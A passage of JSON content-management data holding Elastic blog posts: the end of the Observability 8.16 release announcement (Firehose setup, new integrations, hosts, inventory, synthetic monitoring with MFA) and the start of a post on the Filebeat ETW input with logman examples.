preview):\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e This guided workflow simplifies the setup of an Amazon Data Firehose delivery stream using a prepopulated Amazon CloudFormation template, ingesting all of the available Amazon CloudWatch Logs and Metrics across multiple services for a given customer account.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1ec77561c1f6b7c7"}}},{"image":{"image":{"uid":"blt2b3d94f2195439f4","_version":1,"title":"15.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:43:04.895Z","updated_at":"2024-11-11T19:43:04.895Z","content_type":"image/png","file_size":"34682","filename":"15.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.347Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2b3d94f2195439f4/67325e48064225600fdca525/15.png"},"_metadata":{"uid":"cs26d5eab58e2bb157"},"caption_l10n":"","alt_text_l10n":"aws firehose quickstart","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8bbbdaaeb6c42ac9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUsers can either use the AWS console or the AWS CLI to complete this guided workflow, as shown in the illustration below. Users are not required to provision or manage any agent as part of this workflow (agentless).\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs20c99a1f7179a3df"}}},{"image":{"image":{"uid":"blt207eafd863302663","_version":1,"title":"16.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:43:12.619Z","updated_at":"2024-11-11T19:43:12.619Z","content_type":"image/png","file_size":"554597","filename":"16.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.559Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt207eafd863302663/67325e507ca8e884324882de/16.png"},"_metadata":{"uid":"csd5790d9ae431bd5c"},"caption_l10n":"","alt_text_l10n":"set up amazon data firehose","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs19c5ca4f2f96fcc0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt the end of this guided workflow, users are provided a link to the appropriate prebuilt dashboard or curated UI to explore their data on a per-service basis.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"New and enhanced integrations","_metadata":{"uid":"cs025191ced97b361e"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Salesforce integration","_metadata":{"uid":"csdcdfa8964e458903"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe're announcing the general availability (GA) of our updated and revamped Salesforce integration. It now works more seamlessly to connect to, collect, and ingest data from Salesforce, providing better visibility into your Salesforce environment.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"MongoDB Atlas integration ","_metadata":{"uid":"cs1b4485aa24229f4f"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis new integration offers comprehensive observability and monitoring of MongoDB Atlas performance and health through the collection and analysis of logs and metrics. This integration is in beta.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Amazon Data Firehose CloudWatch metrics support","_metadata":{"uid":"cs91e6f0624e0bc47d"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic's integration with Amazon Data Firehose now includes the ability to stream and route CloudWatch metrics to the right destination within Elastic. With this support, you can now stream both logs and metrics seamlessly via Amazon Data Firehose into Elastic, providing a more complete view of their AWS environment. This integration is in beta.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Hosts moving to GA","_metadata":{"uid":"csadc569c709fa0f8c"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Detect and resolve problems with your hosts","_metadata":{"uid":"cse089968b6e95d1af"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe are moving our hosts feature to GA to help you detect and resolve problems with your hosts.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdfa5a0e87d9bf30c"}}},{"video":{"vidyard_uuid":"o4vM5pQ5juWP7FDyryv1sX","_metadata":{"uid":"csd6cf775f961b8436"},"caption_l10n":"Detect and resolve problems with your host out of the box","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs66b90cfc9f14627e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe host feature will help you by:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eOnboarding your hosts quickly \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003ewith effortless onboarding journeys (via OTel)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSeeing what needs attention\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e using alerting and beginning RCA following alerting workflows\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eComparing host performance metrics\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to find the root cause\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSpotting dependencies\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e by seeing which APM-instrumented services are running on your host\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIdentifying resource bottlenecks\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e by viewing the processes and threads (via Universal Profiling)\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"New inventory","_metadata":{"uid":"csbd5b614ed014baaa"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"See what you have and what needs attention","_metadata":{"uid":"cs2a672935591e8e95"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eInventory will be the single place where you can find what you have and what needs attention — even just with logs.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs85b9d3adea25266b"}}},{"video":{"vidyard_uuid":"YizgoHR3d3TeX9kvR13mkN","_metadata":{"uid":"cs44d63fe431a8e447"},"caption_l10n":"New inventory — Debugging a service with only logs ","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf705529733e872b8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur technical preview release of this capability will allow you to:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eView your hosts, containers, and services\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e even if you only collect logs\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSee what needs attention\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e using alerting and beginning RCA following alerting workflows\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePerform seamless service analysis\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e using workflows between Discover and Services\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Synthetic monitoring enhancements","_metadata":{"uid":"csa9d74dddcc794015"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Dramatically improved alerting capabilities","_metadata":{"uid":"cs6adee200f9c491f0"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith the 8.16 release, Elastic synthetic monitoring users now have enhanced control over alert customization in Elastic Observability. Users can set flexible conditions, including the number of monitor downtimes, specific test locations, and applicable tags. Multiple alert rules can also be configured for tailored monitoring.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfa1de35ef6e5b65b"}}},{"image":{"image":{"uid":"blt69b4d867333059d4","_version":1,"title":"19.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:43:20.154Z","updated_at":"2024-11-11T19:43:20.154Z","content_type":"image/png","file_size":"230238","filename":"19.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.421Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt69b4d867333059d4/67325e58a72f99e1093f974c/19.png"},"_metadata":{"uid":"cs482c921b3225ccd5"},"caption_l10n":"","alt_text_l10n":"create rule","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"First-class support for testing user journeys with multifactor authentication (MFA)","_metadata":{"uid":"cs04cdff5bd2cc79a8"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe're excited to announce that Elastic synthetic monitoring now includes first-class multifactor authentication (MFA) support, making secure testing of protected applications easier than ever. This enhancement empowers users to fully automate tests on secure applications without needing UI interactions for the generation of authentication codes — delivering smoother and more secure synthetic monitoring workflows on both inline- and project-based journeys. Learn more in our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/serverless/current/observability-synthetics-mfa.html\"\u003e\u003cspan style='font-size: 12pt;'\u003edocumentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2d7bfc7af237c9bc"}}},{"image":{"image":{"uid":"blt26efb6090178b8df","_version":1,"title":"20.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-11T19:43:30.036Z","updated_at":"2024-11-11T19:43:30.036Z","content_type":"image/png","file_size":"113677","filename":"20.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-12T16:54:33.285Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt26efb6090178b8df/67325e62e5efba823ce075f0/20.png"},"_metadata":{"uid":"csf32b137aedcb9d16"},"caption_l10n":"","alt_text_l10n":"code screenshot","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Try it out","_metadata":{"uid":"csd00539af8a707991"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003eRead about these capabilities and more in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/welcome-to-elastic/current/new.html\"\u003e\u003cspan style='font-size: 12pt;'\u003erelease notes\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003eExisting Elastic Cloud customers can access many of these features directly from the \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud console\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e. Not taking advantage of Elastic on cloud? \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/cloud-trial-overview\"\u003e\u003cspan style='font-size: 12pt;'\u003eStart a free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf61ae5da2968eaac"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd05f2eb6ef89307e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs21728154b259852d"}}}],"publish_date":"2024-11-12","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elastic Observability 8.16: LLM observability for Amazon Bedrock, OTel, and more","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltfc5be1e0932088bf","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-01-11T15:43:19.436Z","updated_at":"2024-01-11T15:43:19.436Z","content_type":"image/jpeg","file_size":"175625","filename":"observability-release-blog.jpg","title":"observability-release-blog.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-01-17T19:00:25.248Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfc5be1e0932088bf/65a00c979853393343116dab/observability-release-blog.jpg"},"title":"Elastic Observability 8.16: Enhanced OpenTelemetry support, advanced log analytics, and streamlined onboarding","title_l10n":"Elastic Observability 8.16: Enhanced OpenTelemetry support, advanced log analytics, and streamlined onboarding","updated_at":"2024-11-18T14:11:41.983Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/whats-new-elastic-observability-8-16-0","publish_details":{"time":"2024-11-18T14:11:48.195Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt6d87dd85c9e0f030","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"Introducing our new Filebeat ETW input followed by integrations for Microsoft DNS Server and a custom integration to capture data from any ETW provider. Learn how to take full advantage of these new Elastic capabilities.","author":["blt20e8c49509353c7a"],"category":["bltb79594af7c5b4199"],"created_at":"2024-11-18T04:27:41.760Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd3fe6385d8be3f31"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eIn the world of security, being able to use system telemetry of Windows hosts opens new possibilities for monitoring, troubleshooting, and securing IT environments. Recognizing this, Elastic has introduced new capabilities focused on Event Tracing for Windows (ETW) — a powerful Windows-native mechanism for capturing a vast array of system and application events. With these new additions, Elastic users can capture, analyze, and visualize Windows telemetry using the Elastic Search AI Platform.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What is ETW?","_metadata":{"uid":"cs15c5954b32128338"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eETW\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e is a lightweight, high-performance Windows-native mechanism for logging detailed event data about \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs/doubling-down-etw-callstacks\"\u003e\u003cspan style='font-size: 12pt;'\u003esystem performance and activity\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e. Unlike traditional Windows event logs, ETW enables users to gather low-level telemetry that can be tailored for different providers and scenarios from system performance insights to application-specific diagnostics.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Motivation for integrating ETW in Elastic","_metadata":{"uid":"csaaa4334e0cbeb84f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eETW has been widely used for diagnostics and performance monitoring within Windows environments, but collecting and managing ETW data traditionally required complex setups. By integrating ETW capabilities directly into Elastic, our goal is to simplify this process, making it easier to collect, filter, and analyze ETW events alongside other system and application logs within Elastic.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Deep dive: Filebeat ETW input","_metadata":{"uid":"csb22f64b193bb9603"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eThe centerpiece of Elastic’s new ETW capabilities is the ETW input for Filebeat. This new input allows Filebeat to directly subscribe to ETW providers, simplifying the way ETW data can be gathered, transmitted, and processed. Here’s an in-depth look at how it works and how you can use it.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"How the Filebeat ETW input works","_metadata":{"uid":"cse9bb6ebfabd60bcb"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThe \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-etw.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFilebeat ETW input\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e subscribes to ETW sessions on a Windows host. An ETW session is a logical grouping of events from ETW providers, which are essentially sources of telemetry data, such as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs/kernel-etw-best-etw\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWindows Kernel\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e and application providers.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThe ETW input in Filebeat uses this subscription mechanism, gathering data in real time and shipping it to Elasticsearch for analysis and visualization. It can operate in three flexible modes and adapt to a range of data collection scenarios for both real-time and historical data needs:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cstrong\u003eCreating a new session:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e In this mode, Filebeat initializes a new ETW session on the Windows host to capture events from user-mode providers. This setup is ideal for scenarios requiring real-time data from applications or services currently running on the system. By creating a dedicated session, users can gather specific telemetry without affecting or relying on pre-existing ETW sessions on the system.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cstrong\u003eAttaching to an existing session: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eFilebeat can also attach to an already active ETW session, collecting ongoing event data generated within that session. This approach is useful for environments where ETW sessions are already in use. It allows administrators to capture events alongside other monitoring workflows without duplicating sessions or impacting system performance.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cstrong\u003eReading from a prerecorded .etl file:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e In some cases, ETW data may be recorded in advance and stored in .etl files. Filebeat can parse these files, enabling users to analyze historical event data. This mode is particularly valuable for retrospective analysis, where users may want to investigate previous system or application behavior based on ETW data captured earlier.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThis flexibility in operational modes allows Filebeat’s ETW input to adapt to diverse use cases — whether for real-time monitoring, forensic analysis, or operational troubleshooting.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Technical workflow overview","_metadata":{"uid":"csc26e76091636ca32"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eOnce the mode is set, the ETW input follows a streamlined process to gather and send data to Elastic:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e\u003cstrong\u003eProvider subscription: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eFilebeat initiates a subscription to one or more ETW providers based on user configuration, whether by creating a new session or connecting to an existing one.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e\u003cstrong\u003eData collection: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eEvents are captured from the active ETW session or parsed from .etl files. ETW records are collected, parsed, and converted into JSON objects to ensure they are structured consistently for valid ingestion. This transformation prepares the data for smooth indexing in Elasticsearch, allowing it to be seamlessly integrated with other log and metric data within Elastic.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e\u003cstrong\u003eTransmission to Elasticsearch: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eOnce events are collected, they’re sent to Elasticsearch for storage and analysis — and ready for visualization within Kibana.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Example use case: Configuring the ETW input","_metadata":{"uid":"cs4e6afd93c6cda579"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eTo demonstrate how the Filebeat ETW input can be configured to capture data from a specific ETW provider, let’s take the example of monitoring the Microsoft DNS Server provider.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eTo configure the Filebeat ETW input for monitoring DNS events, we can use the \u003c/span\u003e\u003cem\u003e\u003c/em\u003e\u003ca href=\"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/logman\" target=\"_blank\"\u003e\u003cem\u003e\u003c/em\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003elogman\u003c/em\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e command-line utility, which provides insight into available ETW providers and their details. \u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cem\u003elogman\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e allows us to list all available providers, view the manifest of each one, and examine details like filterable keywords, trace levels, and other configurations.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eBefore configuring Filebeat to collect events from a specific provider, you may want to view all available ETW providers in your system. To see the full list of providers, run the following command:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd36adcc0994fc8df"}}},{"code":{"code":"PS\u003e logman query providers","_metadata":{"uid":"cscbfd4492b0f96ca1"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs33bebaadcf226f13"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eExample output:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7253c2fc5592ac37"}}},{"code":{"code":"Provider GUID\n-------------------------------------------------------------------------------\nMicrosoft-Windows-Kernel-Process {75A03DF8-6A47-4C6C-B0A0-FB37A13CA342}\nMicrosoft-Windows-Kernel-File {EDD08927-9CC4-4E65-B970-C2560FB5C289}\nMicrosoft-Windows-Kernel-Network {7DD42A49-5329-4832-8DFD-43D979153A88}\nMicrosoft-Windows-DNSServer {EB79061A-A566-4698-9119-3ED2807060E7}\nMicrosoft-Windows-PowerShell {A0C1853B-5C40-4B15-8766-3CF1C58F985A}\n...","_metadata":{"uid":"cs15563fb16a471216"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs696f7d83f707fbd9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eThis command outputs a list of available ETW providers, showing each provider’s name and unique GUID. By locating the provider of interest, you can note its name and GUID for configuration purposes.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eTo see more details about a particular provider as the Microsoft DNS Server, run in a command shell:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse904629003b3f7e6"}}},{"code":{"code":"PS\u003e logman query providers \"Microsoft-Windows-DNSServer\"","_metadata":{"uid":"cs5706ec15ee9562fe"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2dcb161f501ed4a5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAn example output would be:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csbd60242b818e1378"}}},{"code":{"code":"Provider GUID\n-------------------------------------------------------------------------------\nMicrosoft-Windows-DNSServer {EB79061A-A566-4698-9119-3ED2807060E7}\n\nValue Keyword Description\n-------------------------------------------------------------------------------\n0x0000000000000001 QUERY_RECEIVED\n0x0000000000000002 RESPONSE_SUCCESS\n0x0000000000000004 RESPONSE_FAILURE\n0x0000000000000008 IGNORED_QUERY\n0x0000000000000010 RECURSE_QUERY_OUT\n0x0000000000000020 RECURSE_RESPONSE_IN\n0x0000000000000040 RECURSE_QUERY_DROP\n...\n0x8000000000000000 Microsoft-Windows-DNSServer/Analytical Microsoft-Windows-DNS-Server/Analytical\n0x4000000000000000 Microsoft-Windows-DNSServer/Audit Microsoft-Windows-DNS-Server/Audit\n\nValue Level Description\n-------------------------------------------------------------------------------\n0x02 win:Error Error\n0x03 win:Warning Warning\n0x04 win:Informational Information\n\nPID Image\n-------------------------------------------------------------------------------\n0x00000354 C:\\Windows\\System32\\dns.exe\n0x00000354 C:\\Windows\\System32\\dns.exe","_metadata":{"uid":"cs63f0d1280572b557"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse449201fb52b68c6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eFrom this output, we can see that the provider Microsoft-Windows-DNSServer offers several keywords for filtering specific event types, such as QUERY_RECEIVED, RESPONSE_SUCCESS, RESPONSE_FAILURE, and others — each represented by a unique hex code. Additionally, it provides levels (Error, Warning, Informational) that specify the severity of events that can be captured.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 